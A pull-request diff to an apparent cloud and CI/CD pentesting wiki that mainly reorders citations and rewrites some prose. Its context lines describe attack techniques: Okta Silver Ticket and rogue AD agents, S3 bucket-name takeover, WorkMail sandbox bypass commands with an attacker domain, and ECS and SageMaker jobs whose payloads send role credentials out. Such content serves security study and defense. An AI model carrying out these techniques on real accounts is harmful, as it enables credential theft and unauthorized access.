### PR TITLE
Fix citation order and duplicate prose in audited pages

### DIFF
--- a/src/pentesting-ci-cd/github-security/README.md
+++ b/src/pentesting-ci-cd/github-security/README.md
@@ -85,7 +85,7 @@ Several security-related settings can be configured for Actions from the page `h
   - [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization)
 - **Fork pull request workflows from outside collaborators**: Require approval for workflows from outside collaborators before they run.<sup>[[20]](#references)[[21]](#references)</sup>
   - _I couldn't find an API with this info, share if you do_
-- **Run workflows from fork pull requests**: Fork pull request workflows normally receive a read-only `GITHUB_TOKEN` and no repository secrets, but repository settings can grant write tokens or secrets. Do not enable those options unless the workflow and checked-out code are trusted.<sup>[[20]](#references)[[12]](#references)</sup>
+- **Run workflows from fork pull requests**: Fork pull request workflows normally receive a read-only `GITHUB_TOKEN` and no repository secrets, but repository settings can grant write tokens or secrets. Do not enable those options unless the workflow and checked-out code are trusted.<sup>[[12]](#references)[[20]](#references)</sup>
   - _I couldn't find an API with this info, share if you do_
 - **Workflow permissions**: Give workflows only the repository permissions they need, preferably read access by default. Avoid granting write access or permission to create/approve pull requests unless the workflow requires it and its inputs are trusted.<sup>[[20]](#references)[[22]](#references)</sup>
   - [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization)
@@ -155,7 +155,7 @@ An attacker might create a **malicious OAuth application** to access privileged 
 
 These are the [scopes an OAuth application can request](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). Always check the requested scopes before accepting them.<sup>[[31]](#references)</sup>
 
-Moreover, organizations can restrict or approve third-party application access to organization resources.<sup>[[16]](#references)</sup>
+Organizations can restrict or approve OAuth application access to organization resources.<sup>[[16]](#references)</sup>
 
 ### With Github Application
 
@@ -163,7 +163,7 @@ For an introduction about [**Github Applications check the basic information**](
 
 An attacker might create a **malicious GitHub App** to access privileged data or actions for users or organizations that install it, for example as part of a phishing campaign. Review the app’s requested permissions and installation scope before installing it.<sup>[[16]](#references)[[32]](#references)</sup>
 
-Moreover, organizations can restrict or approve third-party application access to organization resources.<sup>[[16]](#references)</sup>
+The corresponding organization policy can also restrict GitHub App installations and access.<sup>[[16]](#references)</sup>
 
 #### Impersonate a GitHub App with its private key (JWT → installation access tokens)
 
@@ -390,7 +390,7 @@ push: # Run it when a push is made to a branch
     - current_branch_name #Use '**' to run when a push is made to any branch
 ```
 
-The `push` event runs workflows for matching branch filters; after a newly created branch becomes covered by a protection rule, subsequent pushes may be restricted. Do not assume that a later branch rule can undo a workflow run that already occurred: by then, a malicious workflow may already have dumped the secrets. Keep secrets behind environment approvals and use least-privilege workflow permissions.<sup>[[35]](#references)[[36]](#references)[[22]](#references)</sup>
+The `push` event runs workflows for matching branch filters; after a newly created branch becomes covered by a protection rule, subsequent pushes may be restricted. Do not assume that a later branch rule can undo a workflow run that already occurred: by then, a malicious workflow may already have dumped the secrets. Keep secrets behind environment approvals and use least-privilege workflow permissions.<sup>[[22]](#references)[[35]](#references)[[36]](#references)</sup>
 
 ## Persistence
 

--- a/src/pentesting-ci-cd/github-security/basic-github-information.md
+++ b/src/pentesting-ci-cd/github-security/basic-github-information.md
@@ -189,8 +189,8 @@ jobs:
 
 You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it.<sup>[[31]](#references)</sup>\
 Additionally, environment protections include:
-- **Required reviewers**: gate jobs targeting the environment until approved. Enable **Prevent self-review** to enforce a proper four‑eyes principle on the approval itself.<sup>[[31]](#references)[[11]](#references)</sup>
-- **Deployment branches and tags**: restrict which branches/tags may deploy to the environment. Prefer selecting specific branches/tags and ensure those branches are protected. Note: the "Protected branches only" option applies to classic branch protections and may not behave as expected if using rulesets.<sup>[[31]](#references)[[11]](#references)</sup>
+- **Required reviewers**: gate jobs targeting the environment until approved. Enable **Prevent self-review** to enforce a proper four‑eyes principle on the approval itself.<sup>[[11]](#references)[[31]](#references)</sup>
+- **Deployment branches and tags**: restrict which branches/tags may deploy to the environment. Prefer selecting specific branches/tags and ensure those branches are protected. Note: the "Protected branches only" option applies to classic branch protections and may not behave as expected if using rulesets.<sup>[[11]](#references)[[31]](#references)</sup>
 - **Wait timer**: delay deployments for a configurable period.<sup>[[31]](#references)</sup>
 
 It can also set a **number of required reviews** before **executing** an **action** using an **environment** or **wait** some **time** before allowing deployments to proceed.<sup>[[31]](#references)</sup>
@@ -228,16 +228,16 @@ The **branch protections of a repository** can be found in _https://github.com/\
 > [!NOTE]
 > Classic branch protection rules are configured per repository. Where the plan supports it, organization-level rulesets can target multiple repositories, so do not confuse rulesets with classic branch protection rules.<sup>[[37]](#references)[[39]](#references)</sup>
 
-Different protections can be applied to a branch (like to master):<sup>[[37]](#references)[[11]](#references)</sup>
+Different protections can be applied to a branch (like to master):<sup>[[11]](#references)[[37]](#references)</sup>
 
-- You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place:<sup>[[37]](#references)[[11]](#references)</sup>
+- You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place:<sup>[[11]](#references)[[37]](#references)</sup>
   - **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly.<sup>[[37]](#references)</sup>
   - **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it.<sup>[[37]](#references)</sup>
   - **Require approval of the most recent reviewable push**. Ensures that any new commits after an approval (including pushes by other collaborators) re-trigger review so an attacker cannot push post-approval changes and merge.<sup>[[37]](#references)</sup>
   - **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it)<sup>[[37]](#references)</sup>
   - **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews.<sup>[[37]](#references)</sup>
   - **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions.<sup>[[37]](#references)</sup>
-- **Require status checks to pass before merging.** Some checks need to pass before being able to merge the commit (like a GitHub App reporting SAST results). Tip: bind required checks to a specific GitHub App; otherwise any app could spoof the check via the Checks API, and many bots accept skip directives (e.g., "@bot-name skip").<sup>[[9]](#references)[[37]](#references)[[11]](#references)</sup>
+- **Require status checks to pass before merging.** Some checks need to pass before being able to merge the commit (like a GitHub App reporting SAST results). Tip: bind required checks to a specific GitHub App; otherwise any app could spoof the check via the Checks API, and many bots accept skip directives (e.g., "@bot-name skip").<sup>[[9]](#references)[[11]](#references)[[37]](#references)</sup>
 - **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged.<sup>[[37]](#references)</sup>
 - **Require signed commits**. The commits need to be signed.<sup>[[37]](#references)</sup>
 - **Require linear history.** Prevent merge commits from being pushed to matching branches.<sup>[[37]](#references)</sup>
@@ -249,13 +249,13 @@ Different protections can be applied to a branch (like to master):<sup>[[37]](#r
 
 ## Tag Protections
 
-Tags (like latest, stable) are mutable by default. To enforce a four‑eyes flow on tag updates, protect tags and chain protections through environments and branches:<sup>[[38]](#references)[[11]](#references)</sup>
+Tags (like latest, stable) are mutable by default. To enforce a four‑eyes flow on tag updates, protect tags and chain protections through environments and branches:<sup>[[11]](#references)[[38]](#references)</sup>
 
-1) On the tag protection rule, enable **Require deployments to succeed** and require a successful deployment to a protected environment (e.g., prod).<sup>[[38]](#references)[[11]](#references)</sup>
-2) In the target environment, restrict **Deployment branches and tags** to the release branch (e.g., main) and optionally configure **Required reviewers** with **Prevent self-review**.<sup>[[31]](#references)[[11]](#references)</sup>
-3) On the release branch, configure branch protections to **Require a pull request**, set approvals ≥ 1, and enable both **Dismiss approvals when new commits are pushed** and **Require approval of the most recent reviewable push**.<sup>[[31]](#references)[[37]](#references)[[38]](#references)[[11]](#references)</sup>
+1) On the tag protection rule, enable **Require deployments to succeed** and require a successful deployment to a protected environment (e.g., prod).<sup>[[11]](#references)[[38]](#references)</sup>
+2) In the target environment, restrict **Deployment branches and tags** to the release branch (e.g., main) and optionally configure **Required reviewers** with **Prevent self-review**.<sup>[[11]](#references)[[31]](#references)</sup>
+3) On the release branch, configure branch protections to **Require a pull request**, set approvals ≥ 1, and enable both **Dismiss approvals when new commits are pushed** and **Require approval of the most recent reviewable push**.<sup>[[11]](#references)[[31]](#references)[[37]](#references)[[38]](#references)</sup>
 
-This chain prevents a single collaborator from retagging or force-publishing releases by editing workflow YAML, since deployment gates are enforced outside of workflows.<sup>[[31]](#references)[[38]](#references)[[11]](#references)</sup>
+This chain prevents a single collaborator from retagging or force-publishing releases by editing workflow YAML, since deployment gates are enforced outside of workflows.<sup>[[11]](#references)[[31]](#references)[[38]](#references)</sup>
 
 ## References
 

--- a/src/pentesting-ci-cd/okta-security/README.md
+++ b/src/pentesting-ci-cd/okta-security/README.md
@@ -45,23 +45,23 @@ If **`companyname.kerberos.okta.com`** is active, **Kerberos can be used for Okt
 
 Compromising the **Okta service account with the delegation SPN enables a Silver Ticket attack.** Because Okta supports **AES** ticket encryption, this requires the AES key or plaintext password. Use **`ticketer.py` to generate a ticket for the victim user** and deliver it through the browser to authenticate with Okta.<sup>[[1]](#references)</sup>
 
-**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**<sup>[[1]](#references)</sup>
+TrustedSec's original walkthrough includes the Kerberos and Silver Ticket procedure.<sup>[[1]](#references)</sup>
 
 ### Hijacking Okta AD Agent
 
 This technique involves **accessing the Okta AD Agent on a server**, which **syncs users and groups and handles authentication**. By examining and decrypting configurations in **`OktaAgentService.exe.config`**, notably the AgentToken using **DPAPI**, an attacker can potentially **intercept and manipulate authentication data**. This allows **monitoring** and **capturing user credentials** in plaintext during the Okta authentication process and **responding to authentication attempts**, enabling unauthorized access or universal authentication through Okta (akin to a “skeleton key”).<sup>[[1]](#references)</sup>
 
-**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**<sup>[[1]](#references)</sup>
+The original Okta AD Agent research documents the configuration and credential-interception workflow.<sup>[[1]](#references)</sup>
 
 ### Hijacking AD As an Admin
 
 This technique involves hijacking an Okta AD Agent by first obtaining an OAuth code and requesting an API token. The token is associated with an AD domain, and a **connector is named to establish a fake AD agent**. Initialization allows the agent to **process authentication attempts** and capture credentials via the Okta API. Automation tools are available to streamline this process and intercept authentication data within the Okta environment.<sup>[[1]](#references)</sup>
 
-**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**<sup>[[1]](#references)</sup>
+TrustedSec's write-up also demonstrates registering and operating the rogue connector.<sup>[[1]](#references)</sup>
 
 ### Okta Fake SAML Provider
 
-**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**<sup>[[1]](#references)</sup>
+The same primary research provides the fake SAML identity-provider procedure summarized below.<sup>[[1]](#references)</sup>
 
 The technique involves **deploying a fake SAML provider**. With a privileged Okta account, an attacker can add an external Identity Provider (IdP), control that IdP, and approve authentication requests. The process entails setting up a SAML 2.0 IdP in Okta, pointing the IdP Single Sign-On URL to a listener through a local hosts-file mapping, generating a self-signed certificate, and configuring Okta to match the incoming username or email. If successful, the attacker can authenticate as an Okta user without that user's credentials; restrict account linking and protect administrator access when reviewing this configuration.<sup>[[1]](#references)[[9]](#references)</sup>
 

--- a/src/pentesting-ci-cd/vercel-security.md
+++ b/src/pentesting-ci-cd/vercel-security.md
@@ -66,11 +66,11 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
 #### Security Configurations:
 
 - **Exposing Sensitive Variables**
-  - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.<sup>[[12]](#references)</sup>
-  - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches.
+  - **Misconfiguration:** Defining a team-level secret with the `NEXT_PUBLIC_` prefix makes it client-accessible in every linked project that inherits it.<sup>[[10]](#references)[[12]](#references)</sup>
+  - **Risk:** One shared value can expose credentials across multiple deployments.
 - **Sensitive disabled**
-  - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets.<sup>[[11]](#references)</sup>
-  - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
+  - **Misconfiguration:** Team variables that are not marked sensitive remain readable to members with sufficient environment access.<sup>[[10]](#references)[[11]](#references)</sup>
+  - **Risk:** Broader team visibility increases the blast radius of an accidental disclosure.
 - **Shared Environment Variables**
   - **Misconfiguration:** These are env variables set at Team level and could also contain sensitive information.<sup>[[10]](#references)</sup>
   - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation/README.md
@@ -122,7 +122,7 @@ aws iam delete-ssh-public-key \
 
 ### Identity Deletion
 
-With permissions like `iam:DeleteUser`, `iam:DeleteGroup`, `iam:DeleteRole`, or `iam:RemoveUserFromGroup`, an actor can delete users, roles, or groups—or change group membership.<sup>[[6]](#references)</sup> Deleting an identity or removing it from a group can immediately remove access for people and services that depend on it; deleting a role or removing its instance-profile role while an instance is running can also break applications on that instance.<sup>[[9]](#references)[[10]](#references)[[11]](#references)[[8]](#references)</sup>
+With permissions like `iam:DeleteUser`, `iam:DeleteGroup`, `iam:DeleteRole`, or `iam:RemoveUserFromGroup`, an actor can delete users, roles, or groups—or change group membership.<sup>[[6]](#references)</sup> Deleting an identity or removing it from a group can immediately remove access for people and services that depend on it; deleting a role or removing its instance-profile role while an instance is running can also break applications on that instance.<sup>[[8]](#references)[[9]](#references)[[10]](#references)[[11]](#references)</sup>
 
 ```bash
 # Delete a user

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation/README.md
@@ -117,9 +117,9 @@ For versioned buckets, `aws s3 rm --recursive` alone does not remove every objec
 
 ### Global bucket name takeover of autonomous writers - `s3:DeleteBucket`
 
-General purpose S3 bucket names are unique across the shared global namespace within an AWS partition. If a victim account has automated writers that keep delivering data to `arn:aws:s3:::<bucket-name>` and an attacker can empty/delete that bucket, the attacker may recreate the same bucket name in an attacker-controlled account and receive future deliveries without changing the upstream service configuration.<sup>[[23]](#references)[[13]](#references)</sup>
+General purpose S3 bucket names are unique across the shared global namespace within an AWS partition. If a victim account has automated writers that keep delivering data to `arn:aws:s3:::<bucket-name>` and an attacker can empty/delete that bucket, the attacker may recreate the same bucket name in an attacker-controlled account and receive future deliveries without changing the upstream service configuration.<sup>[[13]](#references)[[23]](#references)</sup>
 
-Good targets to review include S3 replication destinations and Kinesis Data Firehose delivery streams.<sup>[[23]](#references)[[14]](#references)[[15]](#references)</sup> Also inspect CloudWatch Logs/SNS/WAF delivery chains that land in S3, and custom backup or export jobs.
+Good targets to review include S3 replication destinations and Kinesis Data Firehose delivery streams.<sup>[[14]](#references)[[15]](#references)[[23]](#references)</sup> Also inspect CloudWatch Logs/SNS/WAF delivery chains that land in S3, and custom backup or export jobs.
 
 The following commands show how to inspect destinations, empty/delete a permitted bucket, and recreate the name.<sup>[[16]](#references)[[17]](#references)[[18]](#references)[[19]](#references)[[20]](#references)</sup>
 
@@ -141,7 +141,7 @@ aws s3 mb s3://<BUCKET_NAME> --region <REGION>
 
 The replacement bucket policy must allow the upstream writer to put objects. The exact principal depends on the service: for example an IAM replication role, a Firehose delivery role, or a service principal constrained with `aws:SourceArn` / `aws:SourceAccount`.<sup>[[14]](#references)[[15]](#references)[[22]](#references)</sup>
 
-**Potential Impact:** silent exfiltration of future replicated objects, logs, telemetry, backups, and pipeline artifacts to an attacker-controlled AWS account.<sup>[[23]](#references)[[13]](#references)[[14]](#references)[[15]](#references)</sup>
+**Potential Impact:** silent exfiltration of future replicated objects, logs, telemetry, backups, and pipeline artifacts to an attacker-controlled AWS account.<sup>[[13]](#references)[[14]](#references)[[15]](#references)[[23]](#references)</sup>
 
 **Detection & Mitigation:** alert on deletion of buckets referenced by replication rules or delivery streams, monitor for `NoSuchBucket` delivery failures followed by bucket recreation, restrict `s3:DeleteBucket` on export destinations, and pin cross-account deliveries with strict bucket policies and ownership expectations.<sup>[[23]](#references)</sup>
 

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation/README.md
@@ -73,7 +73,7 @@ aws stepfunctions untag-resource --resource-arn <value> --tag-keys <key>
 
 ### `states:StartExecution` -> Input Injection Into Dangerous Sinks
 
-`states:StartExecution` starts a state-machine execution and accepts JSON input. A `Task` state can pass that input to a Lambda or another service integration, so a workflow that sends unvalidated input to a dangerous sink (for example a Lambda that does `pickle.loads(base64.b64decode(payload_b64))`) can turn **StartExecution** into code execution and data exposure without requiring permission to update the state machine.<sup>[[10]](#references)[[16]](#references)[[13]](#references)</sup>
+`states:StartExecution` starts a state-machine execution and accepts JSON input. A `Task` state can pass that input to a Lambda or another service integration, so a workflow that sends unvalidated input to a dangerous sink (for example a Lambda that does `pickle.loads(base64.b64decode(payload_b64))`) can turn **StartExecution** into code execution and data exposure without requiring permission to update the state machine.<sup>[[10]](#references)[[13]](#references)[[16]](#references)</sup>
 
 #### Discover the workflow and the invoked Lambda
 

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-workmail-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-workmail-post-exploitation/README.md
@@ -2,9 +2,9 @@
 
 ## Abusing WorkMail to bypass SES sandbox
 
-Even if SES is stuck in the **sandbox** (only verified email addresses/domains or the mailbox simulator, 200 messages/24h, 1 message/s), WorkMail does not impose that same verified-recipient gate, although its own quotas still apply.<sup>[[3]](#references)[[1]](#references)[[2]](#references)</sup> An attacker with compromised long-term keys and control of a sending domain can spin up disposable mail infrastructure and, once provisioning and verification complete, start sending immediately:<sup>[[1]](#references)[[5]](#references)</sup>
+Even if SES is stuck in the **sandbox** (only verified email addresses/domains or the mailbox simulator, 200 messages/24h, 1 message/s), WorkMail does not impose that same verified-recipient gate, although its own quotas still apply.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup> An attacker with compromised long-term keys and control of a sending domain can spin up disposable mail infrastructure and, once provisioning and verification complete, start sending immediately:<sup>[[1]](#references)[[5]](#references)</sup>
 
-1. **Create a WorkMail org (region-scoped)**<sup>[[6]](#references)[[1]](#references)</sup>
+1. **Create a WorkMail org (region-scoped)**<sup>[[1]](#references)[[6]](#references)</sup>
    ```bash
    aws workmail create-organization --region us-east-1 --alias temp-mail --directory-id <dir-id-if-reusing>
    ```
@@ -13,7 +13,7 @@ Even if SES is stuck in the **sandbox** (only verified email addresses/domains o
    aws ses verify-domain-identity --domain attacker-domain.com
    aws ses verify-domain-dkim --domain attacker-domain.com
    ```
-3. **Provision mailbox users** and register them:<sup>[[7]](#references)[[8]](#references)[[1]](#references)</sup>
+3. **Provision mailbox users** and register them:<sup>[[1]](#references)[[7]](#references)[[8]](#references)</sup>
    ```bash
    aws workmail create-user --organization-id <org-id> --name marketing --display-name "Marketing"
    aws workmail register-to-work-mail --organization-id <org-id> --entity-id <user-id> --email marketing@attacker-domain.com

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc/README.md
@@ -113,7 +113,7 @@ aws ecr put-registry-policy \
 
 Abuse ECR Pull Through Cache (PTC) rules to map an attacker-controlled upstream namespace to a trusted private ECR prefix. This makes workloads pulling from the private ECR transparently receive attacker images without any push to private ECR.<sup>[[10]](#references)</sup>
 
-- Required perms: `ecr:CreatePullThroughCacheRule` (identity policy), `ecr:BatchImportUpstreamImage`, and `ecr:CreateRepository` when the cached repository does not already exist, plus the normal private ECR authentication and pull permissions. `ecr:DescribePullThroughCacheRules` and `ecr:DeletePullThroughCacheRule` are useful for verification and cleanup. If using ECR Public upstream, the attacker also needs `ecr-public:GetAuthorizationToken`, `sts:GetServiceBearerToken`, and permission to create and push to the public repository.<sup>[[11]](#references)[[6]](#references)</sup>
+- Required perms: `ecr:CreatePullThroughCacheRule` (identity policy), `ecr:BatchImportUpstreamImage`, and `ecr:CreateRepository` when the cached repository does not already exist, plus the normal private ECR authentication and pull permissions. `ecr:DescribePullThroughCacheRules` and `ecr:DeletePullThroughCacheRule` are useful for verification and cleanup. If using ECR Public upstream, the attacker also needs `ecr-public:GetAuthorizationToken`, `sts:GetServiceBearerToken`, and permission to create and push to the public repository.<sup>[[6]](#references)[[11]](#references)</sup>
 - Tested upstream: public.ecr.aws
 
 Steps (example):
@@ -168,7 +168,7 @@ docker run --rm ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod
 
 #### Global registry hijack via ROOT Pull-Through Cache rule
 
-Create a Pull-Through Cache (PTC) rule using the special `ecrRepositoryPrefix=ROOT` to map the root of the private ECR registry to an upstream public registry (e.g., ECR Public). Any pull to a non-existent repository in the private registry will be transparently served from upstream, enabling supply-chain hijacking without pushing to private ECR.<sup>[[14]](#references)[[12]](#references)</sup>
+Create a Pull-Through Cache (PTC) rule using the special `ecrRepositoryPrefix=ROOT` to map the root of the private ECR registry to an upstream public registry (e.g., ECR Public). Any pull to a non-existent repository in the private registry will be transparently served from upstream, enabling supply-chain hijacking without pushing to private ECR.<sup>[[12]](#references)[[14]](#references)</sup>
 
 - Required perms: `ecr:CreatePullThroughCacheRule` (identity policy), `ecr:BatchImportUpstreamImage`, `ecr:CreateRepository` when the target repository is absent, and the normal private ECR authentication and pull permissions. `ecr:DescribePullThroughCacheRules` and `ecr:DeletePullThroughCacheRule` are useful for verification and cleanup.<sup>[[11]](#references)</sup>
 - Impact: Pulls to `<account>.dkr.ecr.<region>.amazonaws.com/<any-existing-upstream-path>:<tag>` can succeed and auto-create private repositories sourced from upstream when the required permissions are present.<sup>[[12]](#references)</sup>

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc/README.md
@@ -10,7 +10,7 @@ More **info about ECS** in:
 
 ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:RunTask`
 
-An attacker abusing the `iam:PassRole`, `ecs:RegisterTaskDefinition` and `ecs:RunTask` permission in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it**.<sup>[[16]](#references)[[1]](#references)[[2]](#references)[[3]](#references)</sup>
+An attacker abusing the `iam:PassRole`, `ecs:RegisterTaskDefinition` and `ecs:RunTask` permission in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it**.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[16]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="Reverse Shell" }}
@@ -75,7 +75,7 @@ aws ecs deregister-task-definition --task-definition iam_exfiltration:1
 
 {{#endtabs }}
 
-**Potential Impact:** Direct privesc to a different ECS role.<sup>[[16]](#references)[[1]](#references)[[2]](#references)</sup>
+**Potential Impact:** Direct privesc to a different ECS role.<sup>[[1]](#references)[[2]](#references)[[16]](#references)</sup>
 
 ### `iam:PassRole`, `ecs:RunTask`
 
@@ -153,7 +153,7 @@ aws ecs deregister-task-definition --task-definition iam_exfiltration:1
 
 ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, (`ecs:UpdateService|ecs:CreateService)`
 
-Just like in the previous example an attacker abusing the **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:UpdateService`** or **`ecs:CreateService`** permissions in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it by creating a new service with at least 1 task running.**<sup>[[16]](#references)[[1]](#references)[[3]](#references)[[5]](#references)</sup>
+Just like in the previous example an attacker abusing the **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:UpdateService`** or **`ecs:CreateService`** permissions in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it by creating a new service with at least 1 task running.**<sup>[[1]](#references)[[3]](#references)[[5]](#references)[[16]](#references)</sup>
 
 ```bash
 # Generate task definition with rev shell

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc/README.md
@@ -25,9 +25,9 @@ A client still needs a network path to the brokers. For a private cluster, this 
 
 Public access is a separate connectivity setting. AWS requires unauthenticated access to be off before public access can be enabled, so a public Provisioned cluster cannot use this unauthenticated-access path while it remains public; it must use SASL/IAM, SASL/SCRAM, or mTLS and satisfy the other public-access requirements.<sup>[[5]](#references)</sup>
 
-If a public cluster uses SASL/SCRAM, its sign-in credentials are stored in an associated AWS Secrets Manager secret. If you can read that secret, you can use those credentials to authenticate, but topic access still depends on Kafka ACLs and the cluster's network controls.<sup>[[6]](#references)[[5]](#references)[[8]](#references)</sup>
+If a public cluster uses SASL/SCRAM, its sign-in credentials are stored in an associated AWS Secrets Manager secret. If you can read that secret, you can use those credentials to authenticate, but topic access still depends on Kafka ACLs and the cluster's network controls.<sup>[[5]](#references)[[6]](#references)[[8]](#references)</sup>
 
-If IAM access control is used, public reachability alone is not sufficient: Amazon MSK uses IAM for both authentication and authorization, and IAM policies must grant the Kafka data-plane actions needed for topic access. `kafka:UpdateSecurity` does not itself grant those `kafka-cluster:*` permissions.<sup>[[7]](#references)[[1]](#references)</sup>
+If IAM access control is used, public reachability alone is not sufficient: Amazon MSK uses IAM for both authentication and authorization, and IAM policies must grant the Kafka data-plane actions needed for topic access. `kafka:UpdateSecurity` does not itself grant those `kafka-cluster:*` permissions.<sup>[[1]](#references)[[7]](#references)</sup>
 
 ## References
 

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md
@@ -128,7 +128,7 @@ aws sagemaker create-presigned-mlflow-tracking-server-url \
 
 ### `sagemaker:CreateProcessingJob`, `iam:PassRole`
 
-An attacker with those permissions can make **SageMaker execute a processing job** with a SageMaker role attached to it. By reusing a SageMaker-provided Python container image from the same Region, the attacker can run an inline payload without building a custom image.<sup>[[13]](#references)[[14]](#references)[[15]](#references)[[6]](#references)</sup>
+An attacker with those permissions can make **SageMaker execute a processing job** with a SageMaker role attached to it. By reusing a SageMaker-provided Python container image from the same Region, the attacker can run an inline payload without building a custom image.<sup>[[6]](#references)[[13]](#references)[[14]](#references)[[15]](#references)</sup>
 
 ```bash
 REGION=<region>
@@ -148,11 +148,11 @@ aws sagemaker create-processing-job \
 
 The inline entrypoint reads the container credential endpoint and posts the returned credentials to the configured endpoint; this also requires outbound network access and the role's required image and S3 permissions.<sup>[[13]](#references)[[15]](#references)</sup>
 
-**Potential Impact:** Privesc to the sagemaker service role specified.<sup>[[13]](#references)[[6]](#references)</sup>
+**Potential Impact:** Privesc to the sagemaker service role specified.<sup>[[6]](#references)[[13]](#references)</sup>
 
 ### `sagemaker:CreateTrainingJob`, `iam:PassRole`
 
-An attacker with those permissions can launch a training job that executes arbitrary code with the supplied role. Reusing an official SageMaker container and overriding its entrypoint with an inline payload avoids building a custom image.<sup>[[16]](#references)[[15]](#references)[[6]](#references)</sup>
+An attacker with those permissions can launch a training job that executes arbitrary code with the supplied role. Reusing an official SageMaker container and overriding its entrypoint with an inline payload avoids building a custom image.<sup>[[6]](#references)[[15]](#references)[[16]](#references)</sup>
 
 ```bash
 REGION=<region>
@@ -176,11 +176,11 @@ aws sagemaker create-training-job \
 
 When the job reaches `InProgress`, the inline entrypoint reads the container credential endpoint and posts the credentials to the configured endpoint.<sup>[[15]](#references)[[16]](#references)</sup>
 
-**Potential Impact:** Privesc to the SageMaker service role specified.<sup>[[16]](#references)[[6]](#references)[[15]](#references)</sup>
+**Potential Impact:** Privesc to the SageMaker service role specified.<sup>[[6]](#references)[[15]](#references)[[16]](#references)</sup>
 
 ### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`
 
-An attacker with those permissions can launch a HyperParameter Tuning Job that runs attacker-controlled code under the supplied role. Script mode requires hosting the payload in S3, but the workflow can be automated from the CLI.<sup>[[17]](#references)[[18]](#references)[[16]](#references)[[15]](#references)[[6]](#references)</sup>
+An attacker with those permissions can launch a HyperParameter Tuning Job that runs attacker-controlled code under the supplied role. Script mode requires hosting the payload in S3, but the workflow can be automated from the CLI.<sup>[[6]](#references)[[15]](#references)[[16]](#references)[[17]](#references)[[18]](#references)</sup>
 
 ```bash
 REGION=<region>
@@ -288,12 +288,12 @@ aws sagemaker create-hyper-parameter-tuning-job \
   --training-job-definition file:///tmp/hpo-definition.json
 ```
 
-Each training run launched by the tuning job emits the metric and sends the supplied role's credentials to the configured endpoint.<sup>[[17]](#references)[[18]](#references)[[15]](#references)</sup>
+Each training run launched by the tuning job emits the metric and sends the supplied role's credentials to the configured endpoint.<sup>[[15]](#references)[[17]](#references)[[18]](#references)</sup>
 
 
 ### `sagemaker:UpdateUserProfile`, `iam:PassRole`, `sagemaker:CreateApp`, `sagemaker:CreatePresignedDomainUrl`, (`sagemaker:DeleteApp`)
 
